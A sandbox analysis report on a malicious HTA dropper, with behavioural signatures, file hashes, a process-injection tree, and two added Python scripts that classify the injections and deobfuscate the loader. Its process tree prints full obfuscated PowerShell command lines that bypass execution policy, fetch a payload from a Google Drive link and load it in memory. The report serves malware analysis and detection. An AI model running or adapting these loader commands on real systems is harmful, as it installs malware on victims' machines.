Analysis
  max time kernel: 149s
  max time network: 151s
  platform: windows10-2004_x64
  resource: win10v2004-20241007-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 07/11/2024, 02:51
Static task: static1
Behavioral task: behavioral1
  Sample: 9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta
  Resource: win10v2004-20241007-en
General
  Target: 9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta
  Size: 207KB
  MD5: a834a210eda3bb2a9c5a69e046043cf5
  SHA1: d3f7e634a214c3edda1a69b496cae5e8f4c58492
  SHA256: 9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff
  SHA512: 6019b4c7788df78c3ea2752fe9085e66b333e7f52a31ce9b4632e1d59b8ab3b44c9a96e6e585a33749840e4af422dcaf14ff0d53a4823d65e96ae70aeea98298
  SSDEEP: 96:43F97ZLDySraaVxDyIraaVn6cKt1zRoy3yyhDywMDyPDraaVSDyCQ:43F1ZLdr3Dpr3AcKvay3ySGsDr3wTQ
Malware Config
Extracted
  https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures

Blocklisted process makes network request (30 IoCs)
  flow(s)                                                                                                   pid   Process
  14                                                                                                        3048  POWErsHell.eXE
  17, 21, 26                                                                                                3132  powershell.exe
  40, 46, 48, 49, 50, 51, 53, 55, 58, 63, 64, 66, 68, 69, 70, 71, 73, 75, 76, 77, 78, 80, 81, 82, 83, 84   2364  mshta.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Run Powershell and hide display window.
  pid   Process
  4288  powershell.exe
  3132  powershell.exe

Evasion via Device Credential Deployment (2 IoCs)
  pid   Process
  2292  powershell.exe
  3048  POWErsHell.eXE

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                              Process
  Key value queried  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation  mshta.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation  WScript.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  16    drive.google.com
  17    drive.google.com

Suspicious use of SetThreadContext (5 IoCs)
  pid   Process              target pid  procid_target
  3132  powershell.exe       2148        106
  2148  aspnet_compiler.exe  2364        82
  2148  aspnet_compiler.exe  2356        110
  2356  setupugc.exe         2364        82
  2356  setupugc.exe         5088        112

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 9 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  setupugc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  POWErsHell.eXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Modifies Internet Explorer settings (1 IoC)
  description  ioc                                                                                                          Process
  Key created  \Registry\User\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2  setupugc.exe
Modifies registry class (1 IoC)
  description  ioc                                                                                Process
  Key created  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings  POWErsHell.eXE

Suspicious behavior: EnumeratesProcesses (26 IoCs)
  pid   Process              events
  3048  POWErsHell.eXE       2
  2292  powershell.exe       2
  4288  powershell.exe       2
  3132  powershell.exe       4
  2148  aspnet_compiler.exe  8
  2356  setupugc.exe         8

Suspicious behavior: MapViewOfSection (7 IoCs)
  pid   Process              events
  2148  aspnet_compiler.exe  1
  2364  mshta.exe            2
  2356  setupugc.exe         4

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   3048  POWErsHell.eXE
  Token: SeDebugPrivilege   2292  powershell.exe
  Token: SeDebugPrivilege   4288  powershell.exe
  Token: SeDebugPrivilege   3132  powershell.exe

Suspicious use of WriteProcessMemory (35 IoCs)
  pid   Process         target pid  procid_target  events
  2364  mshta.exe       3048        85             3
  3048  POWErsHell.eXE  2292        89             3
  3048  POWErsHell.eXE  1040        92             3
  1040  csc.exe         1408        93             3
  3048  POWErsHell.eXE  3612        98             3
  3612  WScript.exe     4288        99             3
  4288  powershell.exe  3132        101            3
  3132  powershell.exe  2192        105            3
  3132  powershell.exe  2148        106            6
  2364  mshta.exe       2356        110            3
  2356  setupugc.exe    5088        112            2
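The SetThreadContext table is more informative when each target is placed against the injector's lineage: a target that is the injector's own freshly spawned child is the classic hollowing pattern, while a target that is an ancestor (here mshta.exe, PID 2364, the original HTA host) means the payload is being injected back up the chain. The script below is an added example, not tria.ge output; it parses the rows exactly as they are printed above and uses the parent/child relationships from the process tree later on this page (copied by hand into PROCESS_TREE) to classify each injection.

```python
"""Classify each SetThreadContext edge from the report against the process tree.

Added example; the rows and the tree are copied from this report page.
"""
import re
from typing import Dict, List, Optional, Tuple

# Rows copied from the 'Suspicious use of SetThreadContext' table above.
SET_THREAD_CONTEXT = """
PID 3132 set thread context of 2148 3132 powershell.exe 106
PID 2148 set thread context of 2364 2148 aspnet_compiler.exe 82
PID 2148 set thread context of 2356 2148 aspnet_compiler.exe 110
PID 2356 set thread context of 2364 2356 setupugc.exe 82
PID 2356 set thread context of 5088 2356 setupugc.exe 112
"""

# pid -> (image name, parent pid), transcribed from the process tree on this page.
PROCESS_TREE: Dict[int, Tuple[str, Optional[int]]] = {
    2364: ("mshta.exe", None),
    3048: ("POWErsHell.eXE", 2364),
    2292: ("powershell.exe", 3048),
    1040: ("csc.exe", 3048),
    1408: ("cvtres.exe", 1040),
    3612: ("WScript.exe", 3048),
    4288: ("powershell.exe", 3612),
    3132: ("powershell.exe", 4288),
    2192: ("aspnet_compiler.exe", 3132),
    2148: ("aspnet_compiler.exe", 3132),
    2356: ("setupugc.exe", 2364),
    5088: ("Firefox.exe", 2356),
}

ROW = re.compile(r"PID (\d+) set thread context of (\d+) \d+ (\S+) (\d+)")


def parse_rows(text: str) -> List[Tuple[int, int, str]]:
    """(injector pid, target pid, injector image) for every row in the table."""
    return [(int(src), int(dst), name) for src, dst, name, _ in ROW.findall(text)]


def classify(src: int, dst: int, tree: Dict[int, Tuple[str, Optional[int]]]) -> str:
    """'child' if the target was spawned by the injector (process hollowing),
    'ancestor' if the target sits above the injector in its own lineage,
    otherwise 'unrelated' (a sibling branch of the tree)."""
    if tree[dst][1] == src:
        return "child"
    parent = tree[src][1]
    while parent is not None:
        if parent == dst:
            return "ancestor"
        parent = tree[parent][1]
    return "unrelated"


def injection_report(text: str = SET_THREAD_CONTEXT,
                     tree: Dict[int, Tuple[str, Optional[int]]] = PROCESS_TREE
                     ) -> List[Tuple[int, str, int, str, str]]:
    """One tuple per row: (src pid, src image, dst pid, dst image, relationship)."""
    return [(src, tree[src][0], dst, tree[dst][0], classify(src, dst, tree))
            for src, dst, _ in parse_rows(text)]


if __name__ == "__main__":
    for src, src_name, dst, dst_name, kind in injection_report():
        print(f"{src_name}({src}) -> {dst_name}({dst}): {kind}")
```

Running it shows two hollowing edges (powershell.exe into its child aspnet_compiler.exe, setupugc.exe into its child Firefox.exe), two edges that write back into the ancestor mshta.exe, and one edge from aspnet_compiler.exe into setupugc.exe, which is on a sibling branch and was itself spawned by the already-injected mshta.exe. That ordering explains why setupugc.exe appears as a direct child of mshta.exe in the tree rather than of any PowerShell stage.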
Processes

mshta.exe (PID 2364)
  Image: C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Blocklisted process makes network request
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory

  POWErsHell.eXE (PID 3048, child of 2364)
    Image: C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE
    Command line: "C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'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'+[ChAr]34+'))')))"
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    powershell.exe (PID 2292, child of 3048)
      Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    csc.exe (PID 1040, child of 3048)
      Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2y2etigm\2y2etigm.cmdline"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      cvtres.exe (PID 1408, child of 1040)
        Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA345.tmp" "c:\Users\Admin\AppData\Local\Temp\2y2etigm\CSC46AA2912C3EE4C348AE84B86A9AD7CE.TMP"
        - System Location Discovery: System Language Discovery

    WScript.exe (PID 3612, child of 3048)
      Image: C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"
      - Checks computer location settings
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      powershell.exe (PID 4288, child of 3612)
        Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        powershell.exe (PID 3132, child of 4288)
          Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

          aspnet_compiler.exe (PID 2192, child of 3132)
            Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            (no signatures)

          aspnet_compiler.exe (PID 2148, child of 3132)
            Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection

  setupugc.exe (PID 2356, child of 2364)
    Image: C:\Windows\SysWOW64\setupugc.exe
    Command line: "C:\Windows\SysWOW64\setupugc.exe"
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory

    Firefox.exe (PID 5088, child of 2356)
      Image: C:\Program Files\Mozilla Firefox\Firefox.exe
      Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
      (no signatures)
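The PID 3132 command line above is only lightly obfuscated: the script is assembled from concatenated string pieces, three placeholder tokens stand in for `$`, `'` and `|`, and the result is handed to `.( $pshoME[21]+$PshoMe[34]+'x')`, which on a stock 32- or 64-bit `$PSHOME` path spells `iex`. The script itself fetches a carrier file from the Google Drive URL listed under Malware Config, cuts out the text between `<<BASE64_START>>` and `<<BASE64_END>>`, reverses it, base64-decodes it, loads the result with `[System.Reflection.Assembly]::Load`, and calls `[dnlib.IO.Home]::VAI` with an argument array whose first element reads as a reversed URL. The following Python is an added example, not part of the report: it applies the same three substitutions in the order PowerShell evaluates them to an excerpt of the command line (the `'+'` pieces joined back together and trimmed to the relevant statements), reproduces the loader's marker search on a constructed carrier with a made-up payload, and un-reverses the first VAI argument. The carrier and payload bytes are constructed for the example; nothing is downloaded.

```python
"""Unwrap the obfuscated PowerShell stage (PID 3132) from the report above.

Added example, not tria.ge output. The .REplaCE() chain at the end of that
command line rewrites three placeholder tokens back into PowerShell syntax
before 'iex' evaluates the script.
"""
import base64
import re
from typing import List, Optional

# Substitutions in the order the command line applies them. .NET String.Replace
# is an ordinal, case-sensitive replace, so Python's str.replace is equivalent.
SUBSTITUTIONS = [
    ("aCx", "|"),   # [CHAR]124
    ("K9k", "'"),   # [CHAR]75+[CHAR]57+[CHAR]107 -> [CHAR]39
    ("7zx", "$"),
]

# Excerpt of the page's command line with the '+' string pieces joined back
# together, trimmed to the statements that matter for this example.
OBFUSCATED_EXCERPT = (
    "7zximageUrl = K9khttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;"
    "7zxwebClient = New-Object System.Net.WebClient;"
    "7zximageBytes = 7zxwebClient.DownloadData(7zximageUrl);"
    "7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);"
    "7zxstartFlag = K9k<<BASE64_START>>K9k;7zxendFlag = K9k<<BASE64_END>>K9k;"
    "7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })[-1..-(7zxbase64Command.Length)];"
    "7zxloadedAssembly = [System.Reflection.Assembly]::Load(7zxcommandBytes);"
    "7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);"
    "7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMAC/712/641.391.3.291//:ptthK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9k1K9k));"
)

START_FLAG, END_FLAG = "<<BASE64_START>>", "<<BASE64_END>>"


def deobfuscate(script: str) -> str:
    """Apply the three .Replace() calls in order, yielding the script that iex ran."""
    for token, real in SUBSTITUTIONS:
        script = script.replace(token, real)
    return script


def extract_payload(carrier_text: str) -> Optional[bytes]:
    """Mirror the loader: text between the flags, reversed, then base64-decoded."""
    start = carrier_text.find(START_FLAG)
    end = carrier_text.find(END_FLAG)
    # Same guard as the script's '$startIndex -ge 0 -and $endIndex -gt $startIndex'.
    if start < 0 or end <= start:
        return None
    start += len(START_FLAG)
    return base64.b64decode(carrier_text[start:end][::-1])


def vai_arguments(deobfuscated: str) -> List[str]:
    """Return the argument array passed to [dnlib.IO.Home]::VAI.

    The first element on the page is stored reversed; reversing it again is a
    plain string operation on text that is already on the page.
    """
    m = re.search(r"\.Invoke\(\$null, @\((.*?)\)\);", deobfuscated)
    if not m:
        return []
    args = re.findall(r"'([^']*)'", m.group(1))
    if args:
        args[0] = args[0][::-1]
    return args


# Constructed carrier: the shape the Drive download is expected to have, with a
# made-up placeholder payload (not a real assembly) embedded the way the loader expects.
DEMO_PAYLOAD = b"MZ\x90\x00 constructed placeholder, not the real assembly"
DEMO_CARRIER = (
    "\x89PNG\r\n leading bytes of a decoy image "
    + START_FLAG + base64.b64encode(DEMO_PAYLOAD).decode()[::-1] + END_FLAG
    + " trailing bytes"
)

if __name__ == "__main__":
    clean = deobfuscate(OBFUSCATED_EXCERPT)
    print(clean)
    print(vai_arguments(clean))
    print(extract_payload(DEMO_CARRIER))
```

Two things worth checking when you run this against the real command line rather than the excerpt: the substitutions must be applied in the page's order (a different order would still work here because no token contains another, but that is not guaranteed for other samples of this loader), and the base64 reversal happens before decoding, so a grep for the usual `TVqQ` MZ prefix in the carrier will miss it; search for its reverse.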
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
  Filesize: 2KB
  MD5: 3d086a433708053f9bf9523e1d87a4e8
  SHA1: b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
  SHA256: 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
  SHA512: 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

File 2
  Filesize: 12KB
  MD5: ba534ea8e88d9edf61d5f9589b68b0fd
  SHA1: af66d85643a625b374ba49b805542b376a222b3b
  SHA256: 69e91058bbe1ebd3e09f364218b0f5553ba2e71536c98f143c2099d6af68fe1a
  SHA512: b9cf4524f4951b22b2205c412122361836c16dfb4e21608c6c5ef4cb65f42e3fb10ca59309d79cd33f06468ab5058bc237c270be7ebfe33a8d50d169905017ae

File 3
  Filesize: 18KB
  MD5: 6950ff7e0c0f0a53efc7363d656148fd
  SHA1: 57b72cbb802fb7c0b5433d40268e61adc789ab45
  SHA256: 35a30883527aa900ec2c1cd8be9a041732a6ed86e27407b7b2b1f02d2c25799f
  SHA512: 9c1c686f63ed5b797ea940a40cba122f71f97993b8ccff987ac76b278b1bfd459e69341671f3b57d18cb27d6c72f6364262bb2181428847694c8c042903b9949

File 4
  Filesize: 3KB
  MD5: 045b3b2bbb01d0a614f6083796eef4e0
  SHA1: 1e8f54adcb89b76a87b6929a6c1e09ff76faa09e
  SHA256: 70cf93a8016abe48ec7dbddb5a72af8d189d9180d030d928530b463241c078f2
  SHA512: 8508b012729f92d341c94957d749099b0791528a2c6c826559599679c2cd3098ec9025ec38055a4d16450b291887ea76fd4b45b54f00b9af8b4ce148ef1469f1

File 5
  Filesize: 1KB
  MD5: 0247c31b512e1f7719732a60829cbee3
  SHA1: 16949587db9f0264be925943b7af3fc7f69a54e6
  SHA256: ca9ada3c73f47ab487de026bfd73c000a0e37482c032e018a43ae05627cea247
  SHA512: ec2cc350e90684c14b33e043a2035afc20ac476e91b67c2ff42258f699b23341365f01f5350c84674b0c53b77281d123714230ad259c0617044dce91f4960b24

File 6
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

File 7
  Filesize: 138KB
  MD5: 6d668e698465e2b247c18af64cd92768
  SHA1: 9f0d8dc1bf9863ce10df0779404b46f11e05878e
  SHA256: ebe21b018238666a7386c805e391635b4a6a1397be0cebcc1cd1a0b4c2a9ac03
  SHA512: 53d6e582ad8ab0a373183e4825a829ab9788dcd965b76912b2666a0ad6e17233f100a2c9916fc9bb36c6034a4b21588ac26793f87f7f66b2f5037652ea989d8e

File 8
  Filesize: 483B
  MD5: 0d07f4ab30ba01353f767eca7b280b1a
  SHA1: b5b6d65652a490f5eeeaf899884cec55cc09d455
  SHA256: f7082f6db40c262a4b1f34cbf2e9a8ed8a97090e49968d630cb087d1a62ef31e
  SHA512: 001b1bd234cf1f9dacf6fa54fad0857277c4c349c2f615fb4f6d2c1dc064a249594aedb1c9587a7f1eba1de1a9aa825e5f415248ddc9379475723105524165a3

File 9
  Filesize: 369B
  MD5: faaa2420f277dcab393401fc70522d64
  SHA1: abbc1a2d17011b9b38cb3e75f2cb7f511b64e63b
  SHA256: 0476b05c93092b0c9b0ef5392bf65359f54d26a035db5d3014ec9d58982e4153
  SHA512: ddb1aaee508aef029024cdf3e96dd0dd6b7f00a8e5207688a1af2cf43a110eb395e7e65f18ab6e0513b6a822e1342352631090abe7b367a55419a3b51d11ee30

File 10
  Filesize: 652B
  MD5: ec4a9b1e96e66cfb9fcf41180779f432
  SHA1: 65c8b96275a380f90e1369b06c70261126bdb0d5
  SHA256: b9b61800810c0619996f3549afc257c34b1af6ce46691a324bc4590223829d7a
  SHA512: 0007fd7ab0ea98e2b00ede381b6697f743bca4b5e42b401cbb489e8bb5927f5899e854898a96a363782a6c98d347db1ed93340cdf65bef17053a5366cb7e7379